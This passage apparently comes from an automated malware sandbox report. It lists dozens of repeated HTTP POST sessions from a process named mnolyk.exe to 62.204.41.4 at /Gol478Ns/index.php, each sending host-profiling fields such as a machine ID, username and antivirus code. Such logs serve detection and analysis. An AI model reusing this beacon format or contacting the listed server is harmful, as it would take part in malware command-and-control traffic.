                            Connection: keep-alive
                            Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                            Data Ascii: 6<c><d>0


                            Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
                            228 | 192.168.2.4 | 49923 | 62.204.41.4 | 80 | C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe
                            Timestamp | kBytes transferred | Direction | Data
                            Feb 8, 2023 17:38:30.522432089 CET | 417 | OUT | POST /Gol478Ns/index.php HTTP/1.1
                            Content-Type: application/x-www-form-urlencoded
                            Host: 62.204.41.4
                            Content-Length: 87
                            Cache-Control: no-cache
                            Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 31 34 31 37 30 30 26 75 6e 3d 6a 6f 6e 65 73 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31
                            Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=141700&un=user&dm=&av=13&lv=0&og=1
                            Feb 8, 2023 17:38:30.588219881 CET | 417 | IN | HTTP/1.1 200 OK
                            Server: nginx/1.18.0 (Ubuntu)
                            Date: Wed, 08 Feb 2023 16:38:30 GMT
                            Content-Type: text/html; charset=UTF-8
                            Transfer-Encoding: chunked
                            Connection: keep-alive
                            Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                            Data Ascii: 6<c><d>0


                            Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
                            229 | 192.168.2.4 | 49924 | 62.204.41.4 | 80 | C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe
                            Timestamp | kBytes transferred | Direction | Data
                            Feb 8, 2023 17:38:30.980932951 CET | 418 | OUT | POST /Gol478Ns/index.php HTTP/1.1
                            Content-Type: application/x-www-form-urlencoded
                            Host: 62.204.41.4
                            Content-Length: 87
                            Cache-Control: no-cache
                            Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 31 34 31 37 30 30 26 75 6e 3d 6a 6f 6e 65 73 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31
                            Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=141700&un=user&dm=&av=13&lv=0&og=1
                            Feb 8, 2023 17:38:31.048573017 CET | 418 | IN | HTTP/1.1 200 OK
                            Server: nginx/1.18.0 (Ubuntu)
                            Date: Wed, 08 Feb 2023 16:38:31 GMT
                            Content-Type: text/html; charset=UTF-8
                            Transfer-Encoding: chunked
                            Connection: keep-alive
                            Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                            Data Ascii: 6<c><d>0


                            Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
                            23 | 192.168.2.4 | 49718 | 62.204.41.4 | 80 | C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe
                            Timestamp | kBytes transferred | Direction | Data
                            Feb 8, 2023 17:37:30.060142994 CET | 212 | OUT | POST /Gol478Ns/index.php HTTP/1.1
                            Content-Type: application/x-www-form-urlencoded
                            Host: 62.204.41.4
                            Content-Length: 87
                            Cache-Control: no-cache
                            Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 31 34 31 37 30 30 26 75 6e 3d 6a 6f 6e 65 73 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31
                            Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=141700&un=user&dm=&av=13&lv=0&og=1
                            Feb 8, 2023 17:37:30.126377106 CET | 212 | IN | HTTP/1.1 200 OK
                            Server: nginx/1.18.0 (Ubuntu)
                            Date: Wed, 08 Feb 2023 16:37:30 GMT
                            Content-Type: text/html; charset=UTF-8
                            Transfer-Encoding: chunked
                            Connection: keep-alive
                            Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                            Data Ascii: 6<c><d>0


                            Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
                            230 | 192.168.2.4 | 49925 | 62.204.41.4 | 80 | C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe
                            Timestamp | kBytes transferred | Direction | Data
                            Feb 8, 2023 17:38:31.225193977 CET | 419 | OUT | POST /Gol478Ns/index.php HTTP/1.1
                            Content-Type: application/x-www-form-urlencoded
                            Host: 62.204.41.4
                            Content-Length: 87
                            Cache-Control: no-cache
                            Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 31 34 31 37 30 30 26 75 6e 3d 6a 6f 6e 65 73 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31
                            Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=141700&un=user&dm=&av=13&lv=0&og=1
                            Feb 8, 2023 17:38:31.289877892 CET | 419 | IN | HTTP/1.1 200 OK
                            Server: nginx/1.18.0 (Ubuntu)
                            Date: Wed, 08 Feb 2023 16:38:31 GMT
                            Content-Type: text/html; charset=UTF-8
                            Transfer-Encoding: chunked
                            Connection: keep-alive
                            Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                            Data Ascii: 6<c><d>0


                            Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
                            231 | 192.168.2.4 | 49926 | 62.204.41.4 | 80 | C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe
                            Timestamp | kBytes transferred | Direction | Data
                            Feb 8, 2023 17:38:31.519366026 CET | 420 | OUT | POST /Gol478Ns/index.php HTTP/1.1
                            Content-Type: application/x-www-form-urlencoded
                            Host: 62.204.41.4
                            Content-Length: 87
                            Cache-Control: no-cache
                            Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 31 34 31 37 30 30 26 75 6e 3d 6a 6f 6e 65 73 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31
                            Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=141700&un=user&dm=&av=13&lv=0&og=1
                            Feb 8, 2023 17:38:31.584067106 CET | 420 | IN | HTTP/1.1 200 OK
                            Server: nginx/1.18.0 (Ubuntu)
                            Date: Wed, 08 Feb 2023 16:38:31 GMT
                            Content-Type: text/html; charset=UTF-8
                            Transfer-Encoding: chunked
                            Connection: keep-alive
                            Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                            Data Ascii: 6<c><d>0


                            Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
                            232 | 192.168.2.4 | 49927 | 62.204.41.4 | 80 | C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe
                            Timestamp | kBytes transferred | Direction | Data
                            Feb 8, 2023 17:38:32.329981089 CET | 421 | OUT | POST /Gol478Ns/index.php HTTP/1.1
                            Content-Type: application/x-www-form-urlencoded
                            Host: 62.204.41.4
                            Content-Length: 87
                            Cache-Control: no-cache
                            Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 31 34 31 37 30 30 26 75 6e 3d 6a 6f 6e 65 73 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31
                            Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=141700&un=user&dm=&av=13&lv=0&og=1
                            Feb 8, 2023 17:38:32.395512104 CET | 421 | IN | HTTP/1.1 200 OK
                            Server: nginx/1.18.0 (Ubuntu)
                            Date: Wed, 08 Feb 2023 16:38:32 GMT
                            Content-Type: text/html; charset=UTF-8
                            Transfer-Encoding: chunked
                            Connection: keep-alive
                            Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                            Data Ascii: 6<c><d>0


                            Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
                            233 | 192.168.2.4 | 49928 | 62.204.41.4 | 80 | C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe
                            Timestamp | kBytes transferred | Direction | Data
                            Feb 8, 2023 17:38:32.721034050 CET | 422 | OUT | POST /Gol478Ns/index.php HTTP/1.1
                            Content-Type: application/x-www-form-urlencoded
                            Host: 62.204.41.4
                            Content-Length: 87
                            Cache-Control: no-cache
                            Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 31 34 31 37 30 30 26 75 6e 3d 6a 6f 6e 65 73 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31
                            Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=141700&un=user&dm=&av=13&lv=0&og=1
                            Feb 8, 2023 17:38:32.783979893 CET | 422 | IN | HTTP/1.1 200 OK
                            Server: nginx/1.18.0 (Ubuntu)
                            Date: Wed, 08 Feb 2023 16:38:32 GMT
                            Content-Type: text/html; charset=UTF-8
                            Transfer-Encoding: chunked
                            Connection: keep-alive
                            Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                            Data Ascii: 6<c><d>0


                            Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
                            234 | 192.168.2.4 | 49929 | 62.204.41.4 | 80 | C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe
                            Timestamp | kBytes transferred | Direction | Data
                            Feb 8, 2023 17:38:33.000267982 CET | 423 | OUT | POST /Gol478Ns/index.php HTTP/1.1
                            Content-Type: application/x-www-form-urlencoded
                            Host: 62.204.41.4
                            Content-Length: 87
                            Cache-Control: no-cache
                            Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 31 34 31 37 30 30 26 75 6e 3d 6a 6f 6e 65 73 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31
                            Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=141700&un=user&dm=&av=13&lv=0&og=1
                            Feb 8, 2023 17:38:33.066776991 CET | 423 | IN | HTTP/1.1 200 OK
                            Server: nginx/1.18.0 (Ubuntu)
                            Date: Wed, 08 Feb 2023 16:38:33 GMT
                            Content-Type: text/html; charset=UTF-8
                            Transfer-Encoding: chunked
                            Connection: keep-alive
                            Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                            Data Ascii: 6<c><d>0


                            Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
                            235 | 192.168.2.4 | 49930 | 62.204.41.4 | 80 | C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe
                            Timestamp | kBytes transferred | Direction | Data
                            Feb 8, 2023 17:38:33.757164955 CET | 424 | OUT | POST /Gol478Ns/index.php HTTP/1.1
                            Content-Type: application/x-www-form-urlencoded
                            Host: 62.204.41.4
                            Content-Length: 87
                            Cache-Control: no-cache
                            Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 31 34 31 37 30 30 26 75 6e 3d 6a 6f 6e 65 73 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31
                            Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=141700&un=user&dm=&av=13&lv=0&og=1
                            Feb 8, 2023 17:38:33.818859100 CET | 424 | IN | HTTP/1.1 200 OK
                            Server: nginx/1.18.0 (Ubuntu)
                            Date: Wed, 08 Feb 2023 16:38:33 GMT
                            Content-Type: text/html; charset=UTF-8
                            Transfer-Encoding: chunked
                            Connection: keep-alive
                            Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                            Data Ascii: 6<c><d>0


                            Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
                            236 | 192.168.2.4 | 49931 | 62.204.41.4 | 80 | C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe
                            Timestamp | kBytes transferred | Direction | Data
                            Feb 8, 2023 17:38:34.030036926 CET | 425 | OUT | POST /Gol478Ns/index.php HTTP/1.1
                            Content-Type: application/x-www-form-urlencoded
                            Host: 62.204.41.4
                            Content-Length: 87
                            Cache-Control: no-cache
                            Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 31 34 31 37 30 30 26 75 6e 3d 6a 6f 6e 65 73 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31
                            Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=141700&un=user&dm=&av=13&lv=0&og=1
                            Feb 8, 2023 17:38:34.098907948 CET | 425 | IN | HTTP/1.1 200 OK
                            Server: nginx/1.18.0 (Ubuntu)
                            Date: Wed, 08 Feb 2023 16:38:34 GMT
                            Content-Type: text/html; charset=UTF-8
                            Transfer-Encoding: chunked
                            Connection: keep-alive
                            Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                            Data Ascii: 6<c><d>0


                            Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
                            237 | 192.168.2.4 | 49932 | 62.204.41.4 | 80 | C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe
                            Timestamp | kBytes transferred | Direction | Data
                            Feb 8, 2023 17:38:34.522912025 CET | 426 | OUT | POST /Gol478Ns/index.php HTTP/1.1
                            Content-Type: application/x-www-form-urlencoded
                            Host: 62.204.41.4
                            Content-Length: 87
                            Cache-Control: no-cache
                            Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 31 34 31 37 30 30 26 75 6e 3d 6a 6f 6e 65 73 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31
                            Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=141700&un=user&dm=&av=13&lv=0&og=1
                            Feb 8, 2023 17:38:34.585572958 CET | 426 | IN | HTTP/1.1 200 OK
                            Server: nginx/1.18.0 (Ubuntu)
                            Date: Wed, 08 Feb 2023 16:38:34 GMT
                            Content-Type: text/html; charset=UTF-8
                            Transfer-Encoding: chunked
                            Connection: keep-alive
                            Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                            Data Ascii: 6<c><d>0


                            Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
                            238 | 192.168.2.4 | 49933 | 62.204.41.4 | 80 | C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe
                            Timestamp | kBytes transferred | Direction | Data
                            Feb 8, 2023 17:38:34.763684988 CET | 427 | OUT | POST /Gol478Ns/index.php HTTP/1.1
                            Content-Type: application/x-www-form-urlencoded
                            Host: 62.204.41.4
                            Content-Length: 87
                            Cache-Control: no-cache
                            Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 31 34 31 37 30 30 26 75 6e 3d 6a 6f 6e 65 73 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31
                            Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=141700&un=user&dm=&av=13&lv=0&og=1
                            Feb 8, 2023 17:38:34.827692032 CET | 427 | IN | HTTP/1.1 200 OK
                            Server: nginx/1.18.0 (Ubuntu)
                            Date: Wed, 08 Feb 2023 16:38:34 GMT
                            Content-Type: text/html; charset=UTF-8
                            Transfer-Encoding: chunked
                            Connection: keep-alive
                            Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                            Data Ascii: 6<c><d>0


                            Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
                            239 | 192.168.2.4 | 49934 | 62.204.41.4 | 80 | C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe
                            Timestamp | kBytes transferred | Direction | Data
                            Feb 8, 2023 17:38:35.008002043 CET | 428 | OUT | POST /Gol478Ns/index.php HTTP/1.1
                            Content-Type: application/x-www-form-urlencoded
                            Host: 62.204.41.4
                            Content-Length: 87
                            Cache-Control: no-cache
                            Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 31 34 31 37 30 30 26 75 6e 3d 6a 6f 6e 65 73 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31
                            Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=141700&un=user&dm=&av=13&lv=0&og=1
                            Feb 8, 2023 17:38:35.074621916 CET | 428 | IN | HTTP/1.1 200 OK
                            Server: nginx/1.18.0 (Ubuntu)
                            Date: Wed, 08 Feb 2023 16:38:35 GMT
                            Content-Type: text/html; charset=UTF-8
                            Transfer-Encoding: chunked
                            Connection: keep-alive
                            Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                            Data Ascii: 6<c><d>0


                            Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
                            24 | 192.168.2.4 | 49719 | 62.204.41.4 | 80 | C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe
                            Timestamp | kBytes transferred | Direction | Data
                            Feb 8, 2023 17:37:30.308623075 CET | 213 | OUT | POST /Gol478Ns/index.php HTTP/1.1
                            Content-Type: application/x-www-form-urlencoded
                            Host: 62.204.41.4
                            Content-Length: 87
                            Cache-Control: no-cache
                            Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 31 34 31 37 30 30 26 75 6e 3d 6a 6f 6e 65 73 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31
                            Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=141700&un=user&dm=&av=13&lv=0&og=1
                            Feb 8, 2023 17:37:30.377908945 CET | 213 | IN | HTTP/1.1 200 OK
                            Server: nginx/1.18.0 (Ubuntu)
                            Date: Wed, 08 Feb 2023 16:37:30 GMT
                            Content-Type: text/html; charset=UTF-8
                            Transfer-Encoding: chunked
                            Connection: keep-alive
                            Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                            Data Ascii: 6<c><d>0


                            Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
                            240 | 192.168.2.4 | 49935 | 62.204.41.4 | 80 | C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe
                            Timestamp | kBytes transferred | Direction | Data
                            Feb 8, 2023 17:38:35.242769003 CET | 429 | OUT | POST /Gol478Ns/index.php HTTP/1.1
                            Content-Type: application/x-www-form-urlencoded
                            Host: 62.204.41.4
                            Content-Length: 87
                            Cache-Control: no-cache
                            Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 31 34 31 37 30 30 26 75 6e 3d 6a 6f 6e 65 73 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31
                            Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=141700&un=user&dm=&av=13&lv=0&og=1
                            Feb 8, 2023 17:38:35.305485964 CET | 429 | IN | HTTP/1.1 200 OK
                            Server: nginx/1.18.0 (Ubuntu)
                            Date: Wed, 08 Feb 2023 16:38:35 GMT
                            Content-Type: text/html; charset=UTF-8
                            Transfer-Encoding: chunked
                            Connection: keep-alive
                            Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                            Data Ascii: 6<c><d>0


                            Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
                            241 | 192.168.2.4 | 49936 | 62.204.41.4 | 80 | C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe
                            Timestamp | kBytes transferred | Direction | Data
                            Feb 8, 2023 17:38:35.483540058 CET | 430 | OUT | POST /Gol478Ns/index.php HTTP/1.1
                            Content-Type: application/x-www-form-urlencoded
                            Host: 62.204.41.4
                            Content-Length: 87
                            Cache-Control: no-cache
                            Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 31 34 31 37 30 30 26 75 6e 3d 6a 6f 6e 65 73 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31
                            Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=141700&un=user&dm=&av=13&lv=0&og=1
                            Feb 8, 2023 17:38:35.549552917 CET | 430 | IN | HTTP/1.1 200 OK
                            Server: nginx/1.18.0 (Ubuntu)
                            Date: Wed, 08 Feb 2023 16:38:35 GMT
                            Content-Type: text/html; charset=UTF-8
                            Transfer-Encoding: chunked
                            Connection: keep-alive
                            Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                            Data Ascii: 6<c><d>0


                            Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
                            242 | 192.168.2.4 | 49937 | 62.204.41.4 | 80 | C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe
                            Timestamp | kBytes transferred | Direction | Data
                            Feb 8, 2023 17:38:35.731318951 CET | 431 | OUT | POST /Gol478Ns/index.php HTTP/1.1
                            Content-Type: application/x-www-form-urlencoded
                            Host: 62.204.41.4
                            Content-Length: 87
                            Cache-Control: no-cache
                            Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 31 34 31 37 30 30 26 75 6e 3d 6a 6f 6e 65 73 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31
                            Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=141700&un=user&dm=&av=13&lv=0&og=1
                            Feb 8, 2023 17:38:35.794156075 CET | 431 | IN | HTTP/1.1 200 OK
                            Server: nginx/1.18.0 (Ubuntu)
                            Date: Wed, 08 Feb 2023 16:38:35 GMT
                            Content-Type: text/html; charset=UTF-8
                            Transfer-Encoding: chunked
                            Connection: keep-alive
                            Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                            Data Ascii: 6<c><d>0


                            Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
                            243 | 192.168.2.4 | 49938 | 62.204.41.4 | 80 | C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe
                            Timestamp | kBytes transferred | Direction | Data
                            Feb 8, 2023 17:38:35.977194071 CET | 432 | OUT | POST /Gol478Ns/index.php HTTP/1.1
                            Content-Type: application/x-www-form-urlencoded
                            Host: 62.204.41.4
                            Content-Length: 87
                            Cache-Control: no-cache
                            Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 31 34 31 37 30 30 26 75 6e 3d 6a 6f 6e 65 73 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31
                            Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=141700&un=user&dm=&av=13&lv=0&og=1
                            Feb 8, 2023 17:38:36.045663118 CET | 432 | IN | HTTP/1.1 200 OK
                            Server: nginx/1.18.0 (Ubuntu)
                            Date: Wed, 08 Feb 2023 16:38:36 GMT
                            Content-Type: text/html; charset=UTF-8
                            Transfer-Encoding: chunked
                            Connection: keep-alive
                            Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                            Data Ascii: 6<c><d>0


                            Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
                            244 | 192.168.2.4 | 49939 | 62.204.41.4 | 80 | C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe
                            Timestamp | kBytes transferred | Direction | Data
                            Feb 8, 2023 17:38:36.225912094 CET | 432 | OUT | POST /Gol478Ns/index.php HTTP/1.1
                            Content-Type: application/x-www-form-urlencoded
                            Host: 62.204.41.4
                            Content-Length: 87
                            Cache-Control: no-cache
                            Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 31 34 31 37 30 30 26 75 6e 3d 6a 6f 6e 65 73 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31
                            Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=141700&un=user&dm=&av=13&lv=0&og=1
                            Feb 8, 2023 17:38:36.289037943 CET | 433 | IN | HTTP/1.1 200 OK
                            Server: nginx/1.18.0 (Ubuntu)
                            Date: Wed, 08 Feb 2023 16:38:36 GMT
                            Content-Type: text/html; charset=UTF-8
                            Transfer-Encoding: chunked
                            Connection: keep-alive
                            Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                            Data Ascii: 6<c><d>0


                            Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
                            245 | 192.168.2.4 | 49940 | 62.204.41.4 | 80 | C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe
                            Timestamp | kBytes transferred | Direction | Data
                            Feb 8, 2023 17:38:36.464020014 CET | 434 | OUT | POST /Gol478Ns/index.php HTTP/1.1
                            Content-Type: application/x-www-form-urlencoded
                            Host: 62.204.41.4
                            Content-Length: 87
                            Cache-Control: no-cache
                            Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 31 34 31 37 30 30 26 75 6e 3d 6a 6f 6e 65 73 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31
                            Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=141700&un=user&dm=&av=13&lv=0&og=1
                            Feb 8, 2023 17:38:36.526894093 CET | 434 | IN | HTTP/1.1 200 OK
                            Server: nginx/1.18.0 (Ubuntu)
                            Date: Wed, 08 Feb 2023 16:38:36 GMT
                            Content-Type: text/html; charset=UTF-8
                            Transfer-Encoding: chunked
                            Connection: keep-alive
                            Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                            Data Ascii: 6<c><d>0


                            Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
                            246 | 192.168.2.4 | 49941 | 62.204.41.4 | 80 | C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe
                            Timestamp | kBytes transferred | Direction | Data
